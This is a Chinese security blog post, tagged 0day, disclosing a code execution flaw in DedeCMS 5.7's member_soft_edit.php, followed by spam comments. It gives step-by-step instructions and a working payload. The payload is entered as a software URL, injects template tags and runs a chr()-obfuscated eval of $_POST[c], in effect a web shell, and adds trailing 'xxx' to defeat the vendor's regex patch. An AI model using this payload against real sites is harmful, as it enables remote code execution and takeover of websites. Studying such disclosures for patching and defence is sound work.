【河马】dedecms 5.7 member_soft_edit.php代码执行漏洞(gpcOn版)



dedecms 5.7 member_soft_edit.php存在
代码执行漏洞
20140228的补丁对soft_edit.php增加了
if(!preg_match("#[_=&///?\.a-zA-Z0-9-]+$#i", $softurl))
            {
                ShowMsg("确定软件地址提交正确!", "-1");
                exit;
            }
想问一下,这是神马正则?

任何一个字符都能让其匹配

添加上传软件

本地地址 http://www.hao123.com

其它乱填就行,添加成功后,再次进入修改界面



软件地址改为:
http://www.hao123.com}x{/dede:link}{dede:a text'=x']=0;eval(chr(101).chr(118).chr(97).chr(108).chr(40).chr(34).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(93).chr(59).chr(34).chr(41).chr(59));// }xxxx{/dede:a}{dede:link}xxx

注意,这里后面多了 xxx ,就是为了绕过这个正则补丁。



然后执行完全没有压力!

后来测试,在GPC OFF跟 ON下写入的地址有所区别,上面是在ON下写入的。

原因你们懂得。

在 filter.inc.php 中,你们不管 GPC ,全过滤了 addslashes。



而且对这样的$svar[$_k]直接返回错误的值了,这个BUG你们看着办吧。
function _FilterAll($fk, &$svar)
{
    global $cfg_notallowstr,$cfg_replacestr;
    if( is_array($svar) )
    {
        foreach($svar as $_k => $_v)
        {
            $svar[$_k] = _FilterAll($fk,$_v);
        }
    }
    else
    {
        if($cfg_notallowstr!='' && preg_match("#".$cfg_notallowstr."#i", $svar))
        {
            ShowMsg(" $fk has not allow words!",'-1');
            exit();
        }
        if($cfg_replacestr!='')
        {
            $svar = preg_replace('/'.$cfg_replacestr.'/i', "***", $svar);
        }
    }
    return addslashes($svar);
}

/* 对_GET,_POST,_COOKIE进行过滤 */
foreach(Array('_GET','_POST','_COOKIE') as $_request)
{
    foreach($$_request as $_k => $_v)
    {
        ${$_k} = _FilterAll($_k,$_v);
    }
}




只允许会员下载 该文件只允许会员下载! 登录 | 注册

[本日志由 admin 于 2014-09-01 11:01 AM 编辑]
文章来自: 本站原创
引用通告: 查看所有引用 | 我要引用此文章
Tags: 0day
评论: 86 | 引用: 0 | 查看次数: 9950
Modesta [2015-11-15 08:21 PM]
You have got probably the greatest internet sites.


Feel free to visit my homepage: kroger digital coupon
Casey [2015-11-15 02:14 PM]
Lovely Web page, Preserve the useful job. Thanks for your time!


Feel free to visit my website kroger digital coupons paperless
Mandy [2015-11-14 06:05 PM]
Sustain the helpful job and generating the crowd!


Also visit my blog post plenty of fish dating site of free dating
Niamh [2015-11-14 06:35 AM]
Whoa this is a good website.

Also visit my weblog :: Kroger Digital Coupons Sign In
Fausto [2015-11-13 07:18 AM]
Great looking site. Think you did a great deal of your own coding.


My web site: kroger digital coupons
Candice [2015-11-13 06:43 AM]
Seriously, such a important websites.

Feel free to visit my website - krogerfeedback
Gretchen [2015-11-12 10:53 PM]
Pretty enlightening look ahead to returning.

Here is my blog post kroger digital Coupons
Katrina [2015-11-12 03:28 AM]
Many thanks extremely handy. Will share site with my buddies.



Here is my site ... kroger.com digital coupons
Rickie [2015-11-12 03:25 AM]
Basically had to point out I am ecstatic that i stumbled on the website.


Here is my web-site; www.krogerfeedback.com
Leopoldo [2015-11-11 08:18 PM]
Your material is quite significant.

Also visit my website: www.krogerfeedback.com
发表评论
昵 称:
密 码: 游客发言不需要密码.
验证码: 验证码
内 容:
选 项:
虽然发表评论不用注册,但是为了保护您的发言权,建议您注册帐号.
字数限制 1000 字 | UBB代码 开启 | [img]标签 关闭